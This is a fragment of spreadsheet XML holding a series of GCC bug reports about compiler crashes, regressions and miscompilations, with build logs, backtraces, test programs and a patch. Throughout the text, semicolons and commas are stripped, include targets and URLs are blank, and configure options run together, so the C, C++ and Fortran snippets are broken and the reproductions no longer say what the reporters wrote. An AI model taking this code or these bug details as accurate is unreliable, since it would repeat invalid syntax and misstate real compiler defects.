In file included from /builds/gbgbuild/bld/gcc/gcc-4.9.0/gcc/tree-ssa-address.c:1024:0:
./gt-tree-ssa-address.h:86:2: internal compiler error: in operator[] at vec.h:735
 }
  ^
libbacktrace could not find executable to open
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [tree-ssa-address.o] Error 1
make[3]: Leaving directory `/builds/gbgbuild/bld/gcc/stbldap01/obj_stbldap01-4.9.0/gcc'
make[2]: *** [all-stage2-gcc] Error 2
make[2]: Leaving directory `/builds/gbgbuild/bld/gcc/stbldap01/obj_stbldap01-4.9.0'
make[1]: *** [stage2-bubble] Error 2
make[1]: Leaving directory `/builds/gbgbuild/bld/gcc/stbldap01/obj_stbldap01-4.9.0'
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>GCC-40464</t>
  </si>
  <si>
    <t>[4.5 Regression] FAIL: g++.dg/torture/pr34099.C  -O1  (internal compiler error) at -O1 and above</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gnu/gcc-4.5/objdir/gcc/testsuite/g++/../../g++ -B/
home/dave/gnu/gcc-4.5/objdir/gcc/testsuite/g++/../../ /home/dave/gnu/gcc-4.5/gcc
/gcc/testsuite/g++.dg/torture/pr34099.C  -nostdinc++ -I/home/dave/gnu/gcc-4.5/ob
jdir/hppa-linux/libstdc++-v3/include/hppa-linux -I/home/dave/gnu/gcc-4.5/objdir/
hppa-linux/libstdc++-v3/include -I/home/dave/gnu/gcc-4.5/gcc/libstdc++-v3/libsup
c++ -I/home/dave/gnu/gcc-4.5/gcc/libstdc++-v3/include/backward -I/home/dave/gnu/
gcc-4.5/gcc/libstdc++-v3/testsuite/util -fmessage-length=0  -O1      -L/home/dav
e/gnu/gcc-4.5/objdir/hppa-linux/./libstdc++-v3/src/.libs  -L/home/dave/gnu/gcc-4
.5/objdir/hppa-linux/./libstdc++-v3/src/.libs -L/home/dave/gnu/gcc-4.5/objdir/hp
pa-linux/./libiberty  -lm   -o ./pr34099.exe    (timeout = 300)
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/g++.dg/torture/pr34099.C: In function '
void multiply(NumType NumType unsigned int NumType&amp;)':
/home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/g++.dg/torture/pr34099.C:8:1: internal
compiler error: in make_decl_rtl at varasm.c:1309
Please submit a full bug report
(gdb) p debug_tree (decl)
 &lt;var_decl 0x40d586c0 b.86
    type &lt;record_type 0x40d614d0 NumType sizes-gimplified needs-constructing type_1 type_5 type_6 DC
        size 
        unit size 
        align 64 symtab 0 alias set -1 canonical type 0x40caaa80
        fields 
            used private nonlocal decl_3 DC file /home/dave/gnu/gcc-4.5/objdir/hppa-linux/libstdc++-v3/include/complex line 1302 col 17 size  unit size 
            align 64 offset_align 64
            offset 
            bit offset  context  chain &gt; context 
        full-name struct NumType
        needs-constructor X() X(constX&amp;) this=(X&amp;) n_parents=0 use_template=2 interface-unknown
        pointer_to_this  reference_to_this  chain &gt;
    used DC file /home/dave/gnu/gcc-4.5/gcc/gcc/testsuite/g++.dg/torture/pr34099.C line 8 col 1 size  unit size 
    align 64 context  chain &gt;
(gdb) bt
#0  make_decl_rtl (decl=0x40d586c0) at ../../gcc/gcc/varasm.c:1305
#1  0x0031be04 in expand_expr_real_1 (exp=0x40d586c0 target=0x0
    tmode=VOIDmode modifier=EXPAND_NORMAL alt_rtl=0x0)
    at ../../gcc/gcc/expr.c:7358
#2  0x00309ae4 in expand_expr_real (exp=0x40d586c0 target=0x0
    tmode=VOIDmode modifier=EXPAND_NORMAL alt_rtl=0x0)
    at ../../gcc/gcc/expr.c:7183
#3  0x00315624 in expand_expr_real_1 (exp=0x40d7b230 target=0x0
    tmode=VOIDmode modifier=EXPAND_NORMAL alt_rtl=0x0)
    at ../../gcc/gcc/expr.h:542
#4  0x00309a38 in expand_expr_real (exp=0x40d7b230
    target= tmode=
    modifier= alt_rtl=0x0) at ../../gcc/gcc/expr.c:7177
#5  0x00318c9c in expand_expr_real_1 (exp=0x40d78ba0 target=0x40d72f60
    tmode=DFmode modifier=EXPAND_NORMAL alt_rtl=0xfb02da88)
    at ../../gcc/gcc/expr.h:548
#6  0x00309a38 in expand_expr_real (exp=0x40d78ba0
    target= tmode=
    modifier= alt_rtl=0xfb02da88)
    at ../../gcc/gcc/expr.c:7177
#7  0x0030f668 in store_expr (exp=0x40d78ba0 target=0x40d72f60
    call_param_p=0 nontemporal=0 '\0') at ../../gcc/gcc/expr.c:4644
#8  0x0031160c in expand_assignment (to=0x40d76188 from=0x40d78ba0
---Type  to continue or q  to quit---
    nontemporal=0 '\0') at ../../gcc/gcc/expr.c:4428
#9  0x003183f0 in expand_expr_real_1 (exp=0x40d7bc58
    target= tmode=VOIDmode modifier=EXPAND_NORMAL
    alt_rtl=0x0) at ../../gcc/gcc/expr.c:9296
#10 0x00309a38 in expand_expr_real (exp=0x40d7bc58
    target= tmode=
    modifier= alt_rtl=0x0) at ../../gcc/gcc/expr.c:7177
#11 0x0050325c in expand_expr_stmt (exp=0x40d586c0) at ../../gcc/gcc/expr.h:542
#12 0x0071a1cc in expand_gimple_basic_block (bb=0x40d08bd0)
    at ../../gcc/gcc/cfgexpand.c:2146
#13 0x0071b7ec in gimple_expand_cfg () at ../../gcc/gcc/cfgexpand.c:2586
#14 0x00457488 in execute_one_pass (pass=0x978f58)
    at ../../gcc/gcc/passes.c:1290
#15 0x00457744 in execute_pass_list (pass=0x978f58)
    at ../../gcc/gcc/passes.c:1339
#16 0x0056a580 in tree_rest_of_compilation (fndecl=0x40d5c680)
    at ../../gcc/gcc/tree-optimize.c:394
#17 0x006b2208 in cgraph_expand_function (node=0x40d4ff00)
    at ../../gcc/gcc/cgraphunit.c:1097
#18 0x006b4434 in cgraph_optimize () at ../../gcc/gcc/cgraphunit.c:1156
#19 0x00119158 in cp_write_global_declarations ()
    at ../../gcc/gcc/cp/decl2.c:3642
#20 0x0051404c in toplev_main (argc=25 argv=0xfb02d01c)
---Type  to continue or q  to quit---
    at ../../gcc/gcc/toplev.c:1044
#21 0x404c75a4 in __libc_start_main () from /lib/libc.so.6
#22 0x00067978 in _start ()
dave@hiauly6:~/gnu/gcc-4.5/objdir/gcc$ ./xgcc -B./ -v
Reading specs from ./specs
Target: hppa-linux
Configured with: ../gcc/configure --with-gnu-as --with-gnu-ld --enable-shared --prefix=/home/dave/opt/gnu/gcc/gcc-4.4.0 --with-local-prefix=/home/dave/opt/gnu --enable-threads=posix --enable-__cxa_atexit --build=hppa-linux --enable-clocale=gnu --enable-java-gc=boehm --enable-java-awt=xlib --enable-languages=cc++objcfortranobj-c++javaada
Thread model: posix
gcc version 4.5.0 20090616 (experimental) [trunk revision 148510] (GCC)</t>
  </si>
  <si>
    <t>GCC-21951</t>
  </si>
  <si>
    <t>[4.0 only] std::vector.reserve() unusable with -Werror -Wall -O -fno-exceptions</t>
  </si>
  <si>
    <t>Compiling the following code:
#include 
std::vector *factory()
{
        std::vector *p = new std::vector
        p-&gt;reserve(10)
        return p
}
with -Wall -O -fno-exceptions yields the following error in gcc-4.0.0
and gcc-4.0-20050602:
.../include/c++/4.0.0/bits/vector.tcc: In member function 'void std::vector&lt;_Tp
_Alloc&gt;::reserve(size_t) [with _Tp = int _Alloc = std::allocator]':
.../include/c++/4.0.0/bits/vector.tcc:78: warning: control may reach end of
non-void function 'typename _Alloc::pointer std::vector&lt;_Tp
_Alloc&gt;::_M_allocate_and_copy(size_t _ForwardIterator _ForwardIterator) [with
_ForwardIterator = int* _Tp = int _Alloc = std::allocator]' being inlined
The warning comes from a catch/rethrow block deep in the bowels of stl
which (because of -fno-exceptions) evaluates to if(false).
This is a false positive warning which would be fine except
for shops whose policy is to always compile with -Werror -Wall
there the warning is fatal.  And because this problem is not
confined to just one user source file it's hard to work around.
This problem does not occur in gcc-3.4.3 nor in recent gcc-4.1 snapshots.
cf. discussion here: http://gcc.gnu.org/ml/libstdc++/2005-06/msg00073.html</t>
  </si>
  <si>
    <t>GCC-64883</t>
  </si>
  <si>
    <t>FAIL: 17_intro/headers/c++*/all_attributes.cc (test for excess errors) on x86_64-apple-darwin10</t>
  </si>
  <si>
    <t>The tests 17_intro/headers/c++*/all_attributes.cc fail on x86_64-apple-darwin14
g++ -ffunction-sections -fdata-sections -DLOCALEDIR=. -nostdinc++ -I/opt/gcc/build_w/x86_64-apple-darwin14.1.0/i386/libstdc++-v3/include/x86_64-apple-darwin14.1.0 -I/opt/gcc/build_w/x86_64-apple-darwin14.1.0/i386/libstdc++-v3/include -I/opt/gcc/work/libstdc++-v3/libsupc++ -I/opt/gcc/work/libstdc++-v3/testsuite/util /opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc -std=gnu++98 -S -m32
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
 #define noreturn 1
                  ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
 #define noreturn 1
                  ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
 #define noreturn 1
                  ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
 #define deprecated 1
                    ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
 #define noreturn 1
                  ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
 #define deprecated 1
                    ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
 #define deprecated 1
                    ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
 #define deprecated 1
                    ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
 #define deprecated 1
                    ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
 #define deprecated 1
                    ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
 #define deprecated 1
                    ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
 #define deprecated 1
                    ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
 #define deprecated 1
                    ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
 #define deprecated 1
                    ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
 #define noreturn 1
                  ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
 #define noreturn 1
                  ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
 #define noreturn 1
                  ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
 #define deprecated 1
                    ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
In file included from /opt/gcc/build_w/x86_64-apple-darwin14.1.0/i386/libstdc++-v3/include/cstdio:42:0
                 from /opt/gcc/build_w/x86_64-apple-darwin14.1.0/i386/libstdc++-v3/include/x86_64-apple-darwin14.1.0/bits/stdc++.h:46
                 from /opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:32:
/usr/include/stdio.h:276:20: error: declaration does not declare anything [-fpermissive]
 char *tmpnam(char *)
                    ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
 #define deprecated 1
                    ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
In file included from /usr/include/assert.h:42:0
                 from /opt/gcc/build_w/x86_64-apple-darwin14.1.0/i386/libstdc++-v3/include/cassert:43
                 from /opt/gcc/build_w/x86_64-apple-darwin14.1.0/i386/libstdc++-v3/include/x86_64-apple-darwin14.1.0/bits/stdc++.h:33
                 from /opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:32:
/usr/include/stdio.h:391:43: error: declaration does not declare anything [-fpermissive]
 char *tempnam(const char * const char *) __DARWIN_ALIAS(tempnam)
                                           ^
In file included from /opt/gcc/build_w/x86_64-apple-darwin14.1.0/i386/libstdc++-v3/include/x86_64-apple-darwin14.1.0/bits/stdc++.h:46:0
                 from /opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:32:
/opt/gcc/build_w/x86_64-apple-darwin14.1.0/i386/libstdc++-v3/include/cstdio:141:11: error: '::tmpnam' has not been declared
   using ::tmpnam
           ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
 #define noreturn 1
                  ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
 #define noreturn 1
                  ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
 #define noreturn 1
                  ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
 #define deprecated 1
                    ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
In file included from /opt/gcc/build_w/x86_64-apple-darwin14.1.0/i386/libstdc++-v3/include/ext/stdio_sync_filebuf.h:35:0
                 from /opt/gcc/build_w/x86_64-apple-darwin14.1.0/i386/libstdc++-v3/include/x86_64-apple-darwin14.1.0/bits/extc++.h:55
                 from /opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:33:
/usr/include/unistd.h:533:23: error: declaration does not declare anything [-fpermissive]
 void *brk(const void *)
                       ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
 #define deprecated 1
                    ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:25:20: error: expected ')' before numeric constant
In file included from /opt/gcc/build_w/x86_64-apple-darwin14.1.0/i386/libstdc++-v3/include/ext/stdio_sync_filebuf.h:35:0
                 from /opt/gcc/build_w/x86_64-apple-darwin14.1.0/i386/libstdc++-v3/include/x86_64-apple-darwin14.1.0/bits/extc++.h:55
                 from /opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:33:
/usr/include/unistd.h:582:15: error: declaration does not declare anything [-fpermissive]
 void *sbrk(int)
               ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
 #define noreturn 1
                  ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
 #define noreturn 1
                  ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
 #define noreturn 1
                  ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
 #define noreturn 1
                  ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
 #define noreturn 1
                  ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
 #define noreturn 1
                  ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
 #define noreturn 1
                  ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
 #define noreturn 1
                  ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
 #define noreturn 1
                  ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
 #define noreturn 1
                  ^
/opt/gcc/work/libstdc++-v3/testsuite/17_intro/headers/c++1998/all_attributes.cc:26:18: error: expected ')' before numeric constant
The tests have been introduced at r220243.</t>
  </si>
  <si>
    <t>GCC-6450</t>
  </si>
  <si>
    <t>Using hex directive with insertion operator (&lt;&lt;) does not</t>
  </si>
  <si>
    <t>Using fstream or iostream for output to file or standardo out the directive
hex should display the output as a hex number but actually displays as
some floating point junk.	This code works as expected with the 3.0.2
compiler.
Release:
3.0.4
Environment:
System: SunOS sundevshared.engineering.netspeak.com 5.8 Generic_108528-13
sun4u sparc SUNWUltra-4
Architecture: sun4
host: sparc-sun-solaris2.8
build: sparc-sun-solaris2.8
target: sparc-sun-solaris2.8
configured with: ../gcc-3.0.4/configure --enable-threads=posix
--with-as=/vobs/OEM/gnu/binutils/2.11.2/bin/as
--with-ld=/vobs/OEM/gnu/binutils/2.11.2/bin/ld
--prefix=/vobs/OEM/gnu/gcc/3.0.4 --exec-prefix=/vobs/OEM/gnu/gcc/3.0.4
How-To-Repeat:
#include 
#include 
using namespace std
main()
{
    long    i = 100
    ofstream des
    des.open(/tmp/des.out.txt)
    des &lt;&lt; hex &lt;&lt; i &lt;&lt; endl
    des &lt;&lt; dec &lt;&lt; i &lt;&lt; endl
    cout &lt;&lt; hex &lt;&lt; i &lt;&lt; endl
    cout &lt;&lt; dec &lt;&lt; i &lt;&lt; endl
}
Expect this code to print out 64 and then 100.  But actually outputs
2.14315e-312 and 100.
I have collected information available.
Unformatted:
 work correctly.</t>
  </si>
  <si>
    <t>dschindall</t>
  </si>
  <si>
    <t>GCC-83475</t>
  </si>
  <si>
    <t>[8 Regression] ICE: verify_flow_info failed (error: non-cold basic block 3 reachable only by paths crossing the cold partition)</t>
  </si>
  <si>
    <t>gcc-8.0.0-alpha20171217 snapshot (r255766) ICEs when compiling the following snippet w/ -O2 -floop-nest-optimize -fmodulo-sched:
int fc = 0
int c2[8]
void
w8 (void)
{
  int g0
 jn:
  for (g0 = 0 g0 &lt; 2 ++g0)
    {
      int bq
      for (bq = 0 bq &lt; 8 ++bq)
        c2[bq] = 0
    }
  for ()
    {
      if (c2[fc] != 0)
        goto jn
      ++fc
    }
}
% gcc-8.0.0-alpha20171217 -O2 -floop-nest-optimize -fmodulo-sched -c okphcgsy.c
okphcgsy.c: In function 'w8':
okphcgsy.c:24:1: error: non-cold basic block 3 reachable only by paths crossing the cold partition
 }
 ^
during RTL pass: sms
okphcgsy.c:24:1: internal compiler error: verify_flow_info failed
0x965ec2 verify_flow_info()
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/cfghooks.c:265
0x97ed0c checking_verify_flow_info
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/cfghooks.h:198
0x97ed0c cfg_layout_finalize()
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/cfgrtl.c:4326
0x1494e03 execute
	/var/tmp/portage/sys-devel/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/modulo-sched.c:3352</t>
  </si>
  <si>
    <t>GCC-21888</t>
  </si>
  <si>
    <t>bootstrap failure with linker relaxation enabled</t>
  </si>
  <si>
    <t>When bootstrapping for EV4 pp_base_set_prefix is miscompiled.  An fnop is
emitted between the two insns of the initial ldgp pair.
The abi for standard pv usage implied by .prologue 1 requires that this
instruction pair be sequential.  Which allows the linker to alter jsr foo
into bsr foo+8.
With the additional fnop a bsr pp_base_set_prefix+8 results in the gp being
corrupted.  Hilarity ensues.</t>
  </si>
  <si>
    <t>GCC-13299</t>
  </si>
  <si>
    <t>Unsafe treatment of extended givs</t>
  </si>
  <si>
    <t>Loops of the form:
    void f (unsigned int *x)
    {
      unsigned char i
      int j
      i = 0x10
      for (j = 0 j &lt; 0x10 j++)
        {
          i += 0xe8
          x[i] = 0
          i -= 0xe7
        }
    }
are miscompiled on x86 with -freduce-all-givs.  Complete gcc.dg-style
testcase attached.</t>
  </si>
  <si>
    <t>GCC-5333</t>
  </si>
  <si>
    <t>[3.2/3.3/3.4 regression] ICE on nested template classes using other nested template classes</t>
  </si>
  <si>
    <t>GCC gives an ICE when trying to compile the attached .cpp file.
The exact error messsage is:
test.cpp: In instantiation of `B':
test.cpp:29:   instantiated from here
test.cpp:16: Internal error: Speicherzugriffsfehler
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
gcc version 3.0.2 20010917 (prerelease)
Environment:
SuSE Linux 7.3 on a Pentium-III
How-To-Repeat:
g++ -o test test.cpp</t>
  </si>
  <si>
    <t>gollerjo</t>
  </si>
  <si>
    <t>GCC-32678</t>
  </si>
  <si>
    <t>[4.2 4.1]GFortan works incorrectly when writing with FORMAT Tx</t>
  </si>
  <si>
    <t>GFortran writes unpredictable char when it is used modificaters Tx in FORMAT and the first position 'x' is less then current position and the second position 'x' is greater then the maximum previously position.
          write (*10) '12''a''b'
 10     format (a2t1a1t2a1t20' ')
This bug is reproduced in GFortan 4.1.2
Fail case has invisible char with code 0 after 'ab'. You can see this char with hexdump or VIM for example.
fail case
./a.out | hexdump
0000000 6261 2000 2020 2020 2020 2020 2020 2020
0000010 2020 2020 000a
0000015
pass case
./a1.out | hexdump
0000000 6261 2020 2020 2020 2020 2020 2020 2020
0000010 2020 2020 000a
0000015
Satya</t>
  </si>
  <si>
    <t>GCC-15774</t>
  </si>
  <si>
    <t>Conflicting function decls not diagnosed</t>
  </si>
  <si>
    <t>The C++ frontend doesn't always call targetm.compare_type_attributes
when comparing function decls in decl.c: decls_match.  As a result
conflicting decls are not diagnosed.  Here is a testcase.
/* stdcall.c */
extern void foo(int)
void bar() { foo(1)}
void __attribute__((stdcall)) foo(int i) {}
This should casue fatal error because of type conflict between
declaration and definition of foo.
In C it does.
D:\develop\bugs&gt;gcc -S -Wall stdcall.c 
&gt; stdcall.c:5: error: conflicting types for 'foo'
&gt; stdcall.c:1: error: previous declaration of 'foo' was here
In C++ it doesn't
D:\develop\bugs&gt;gcc -xc++ -S -Wall stdcall.c
compiles without error.
But it produces bad code.  This is easier to spot on windows targets because
of the target specific stdcall decoration.
        .file        stdcall.c
        .text
        .align 4
        .align 2
.globl __Z3barv
        .def        __Z3barv        .scl        2        .type        
32        .endef
__Z3barv:
        pushl        %ebp
        movl        %esp %ebp
        subl        $8 %esp
        subl        $12 %esp
        pushl        $1
        call        __Z3fooi   &lt;&lt;&lt; undefined
        addl        $16 %esp  &lt;&lt;&lt; Should be $12.
        leave
        ret
        .align 2
.globl __Z3fooi@4
        .def        __Z3fooi@4        .scl        2        .type        
32        .endef
__Z3fooi@4:
        pushl        %ebp
        movl        %esp %ebp
        leave
        ret        $4
        .def        __Z3fooi        .scl        3        .type        
32        .endef
The testcase fails in 3.4.0 and 3.5.0 on i386-i386-pc-mingw32
The following patch to cp/declc fixes the testcase.  I don't think it is right 
but I'll run it throw bootstrap and regtest and  submit proper patch if it 
doesn't cause any other problems.
Danny
Index: decl.c
===================================================================
RCS file: /cvs/gcc/gcc/gcc/cp/decl.cv
retrieving revision 1.1212
diff -c -3 -p -r1.1212 decl.c
*** decl.c	28 May 2004 21:58:15 -0000	1.1212
--- decl.c	2 Jun 2004 10:35:33 -0000
*************** decls_match (tree newdecl tree olddecl)
*** 10211027 ****
  	    }
  #endif
  	  else
! 	    types_match = compparms (p1 p2)
  	}
        else
  	types_match = 0
--- 10211030 ----
  	    }
  #endif
  	  else
! 	    types_match = compparms (p1 p2)
! 			  &amp;&amp; comptypes (TREE_TYPE (newdecl)
! 					 TREE_TYPE (olddecl)
! 					 COMPARE_REDECLARATION)
  	}
        else
  	types_match = 0</t>
  </si>
  <si>
    <t>GCC-11883</t>
  </si>
  <si>
    <t>[3.3 Regression] gcc 3.3.1 ICE with any -O on mercury-generated *.c file</t>
  </si>
  <si>
    <t>Some files *.c generated by mercury compiler (http://www.cs.mu.oz.au/mercury/)
cause ICE on gcc 3.3 and 3.3.1 if any optimization is used (-O -O2 -O3) at
least on x86.
(mercury preprocesses his *.m files creating *.c files which are compiled
 using gcc that's why this file looks so ugly).
Compiler output:
tree234.c: In function `tree234_module66':
tree234.c:23795: internal compiler error: in flow_loops_find at cfgloop.c:830
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Environment:
System: Linux builder 2.4.20 #1 Sat May 24 09:07:12 UTC 2003 i686 unknown unknown PLD Linux
Architecture: i686
	(Athlon CPU Linux 2.4.20 glibc 2.3.2)
host: i686-pld-linux-gnu
build: i686-pld-linux-gnu
target: i686-pld-linux-gnu
configured with: ../configure --prefix=/usr --infodir=/usr/share/info --mandir=/usr/share/man --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-languages=cc++f77ksi --enable-c99 --enable-long-long --enable-multilib --enable-nls --with-gnu-as --with-gnu-ld --with-system-zlib --with-slibdir=/lib --without-x i686-pld-linux
How-To-Repeat:
Try to compile attached file (which is preprocessed file that comes from
mercury source distribution - mercury-compiler-0.11.0/library/tree234.c)
